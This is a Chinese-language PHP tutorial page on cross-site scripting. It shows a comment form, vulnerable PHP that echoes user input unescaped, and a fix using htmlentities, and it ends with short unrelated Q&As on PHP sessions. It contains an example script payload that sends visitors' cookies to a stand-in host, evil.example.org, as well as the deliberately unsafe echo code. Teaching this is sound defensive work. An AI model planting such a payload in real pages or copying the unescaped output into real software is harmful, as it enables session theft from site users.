PHP安全-跨站腳本攻擊-php教程-PHP中文網

首頁

後端開發

php教程

PHP安全-跨站腳本攻擊

黄舟

Feb 22, 2017 am 09:23 AM

跨站腳本攻擊

跨站腳本攻擊是眾所周知的攻擊方式之一。所有平台上的Web應用程式都深受其擾，PHP應用也不例外。

所有有輸入的應用都面臨風險。 Webmail，論壇，留言本，甚至是Blog。事實上，大多數Web應用程式提供輸入是出於更吸引人氣的目的，但同時這也會把自己置於危險之中。如果輸入沒有正確地進行過濾和轉義，跨站腳本漏洞就產生了。

以一個允許在每個頁面上輸入評論的應用程式為例，它使用了下面的表單來幫助使用者提交：

CODE:

<form action="comment.php" method="POST"
/>
  <p>Name: <input type="text" name="name"
/><br />
  Comment: <textarea name="comment" rows="10"
cols="60"></textarea><br />
  <input type="submit" value="Add Comment"
/></p>
  </form>

#程式向其他造訪該頁面的用戶顯示評論。例如，類似下面的程式碼片段可能用來輸出一個註解($comment)及與之對應的發表人（$name）：

##CODE:

<?php
 
  echo "<p>$name writes:<br />";
  echo
"<blockquote>$comment</blockquote></p>";
 
  ?>

#這個流程對$comment及$name的值給予了充分的信任，想像一下它們中的一個的內容包含如下程式碼：

CODE:

<script>
  document.location =
    &#39;http://evil.example.org/steal.php?cookies=&#39;
+
    document.cookie
  </script>

#如果你的使用者察看這篇評論時，這與你允許別人在你的網站原始程式中加入Javascript程式碼無異。你的使用者會在不知不覺中把他們的cookies(瀏覽網站的人)送到evil.example.org，而接收程式(steal.php)可以透過$_GET['cookies']變數防問所有的cookies 。

這是一個常見的錯誤，主要是由於不好的程式設計習慣所引發的。幸運的是這類錯誤很容易避免。由於這種風險只在你輸出了被污染資料時發生，所以只要確保做到如第一章所述的過濾輸入及轉義輸出即可

## 最起碼你要用htmlentities( )對任何你要輸出到客戶端的資料進行轉義。此函數可以把所有的特殊字元轉換成HTML表示方式。所有會引起瀏覽器進行特殊處理的字元在進行了轉換後，就能確保顯示出來的是原來輸入的內容。

由此，用下面的程式碼顯示註解是比較安全的：

CODE:

<?php
 
  $clean = array();
  $html = array();
 
  /* Filter Input ($name, $comment) */
 
  $html[&#39;name&#39;] = htmlentities($clean[&#39;name&#39;],
ENT_QUOTES, &#39;UTF-8&#39;);
  $html[&#39;comment&#39;] = htmlentities($clean[&#39;comment&#39;],
ENT_QUOTES, &#39;UTF-8&#39;);
 
  echo "<p>{$html[&#39;name&#39;]} writes:<br
/>";
  echo
"<blockquote>{$html[&#39;comment&#39;]}</blockquote></p>";
 
  ?>

以上就是PHP安全-跨站腳本攻擊的內容，更多相關內容請關注PHP中文網（www.php .cn）！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

哪些常見問題會導致PHP會話失敗？Apr 25, 2025 am 12:16 AM

PHPSession失效的原因包括配置錯誤、Cookie問題和Session過期。 1.配置錯誤：檢查並設置正確的session.save_path。 2.Cookie問題：確保Cookie設置正確。 3.Session過期：調整session.gc_maxlifetime值以延長會話時間。

您如何在PHP中調試與會話相關的問題？Apr 25, 2025 am 12:12 AM

在PHP中調試會話問題的方法包括：1.檢查會話是否正確啟動；2.驗證會話ID的傳遞；3.檢查會話數據的存儲和讀取；4.查看服務器配置。通過輸出會話ID和數據、查看會話文件內容等方法，可以有效診斷和解決會話相關的問題。

如果session_start（）被多次調用會發生什麼？Apr 25, 2025 am 12:06 AM

多次調用session_start()會導致警告信息和可能的數據覆蓋。 1)PHP會發出警告，提示session已啟動。 2)可能導致session數據意外覆蓋。 3)使用session_status()檢查session狀態，避免重複調用。

您如何在PHP中配置會話壽命？Apr 25, 2025 am 12:05 AM

在PHP中配置會話生命週期可以通過設置session.gc_maxlifetime和session.cookie_lifetime來實現。 1)session.gc_maxlifetime控制服務器端會話數據的存活時間，2)session.cookie_lifetime控制客戶端cookie的生命週期，設置為0時cookie在瀏覽器關閉時過期。

使用數據庫存儲會話的優點是什麼？Apr 24, 2025 am 12:16 AM

使用數據庫存儲會話的主要優勢包括持久性、可擴展性和安全性。 1.持久性：即使服務器重啟，會話數據也能保持不變。 2.可擴展性：適用於分佈式系統，確保會話數據在多服務器間同步。 3.安全性：數據庫提供加密存儲，保護敏感信息。

您如何在PHP中實現自定義會話處理？Apr 24, 2025 am 12:16 AM

在PHP中實現自定義會話處理可以通過實現SessionHandlerInterface接口來完成。具體步驟包括：1)創建實現SessionHandlerInterface的類，如CustomSessionHandler；2)重寫接口中的方法（如open,close,read,write,destroy,gc）來定義會話數據的生命週期和存儲方式；3)在PHP腳本中註冊自定義會話處理器並啟動會話。這樣可以將數據存儲在MySQL、Redis等介質中，提升性能、安全性和可擴展性。

什麼是會話ID？Apr 24, 2025 am 12:13 AM

SessionID是網絡應用程序中用來跟踪用戶會話狀態的機制。 1.它是一個隨機生成的字符串，用於在用戶與服務器之間的多次交互中保持用戶的身份信息。 2.服務器生成並通過cookie或URL參數發送給客戶端，幫助在用戶的多次請求中識別和關聯這些請求。 3.生成通常使用隨機算法保證唯一性和不可預測性。 4.在實際開發中，可以使用內存數據庫如Redis來存儲session數據，提升性能和安全性。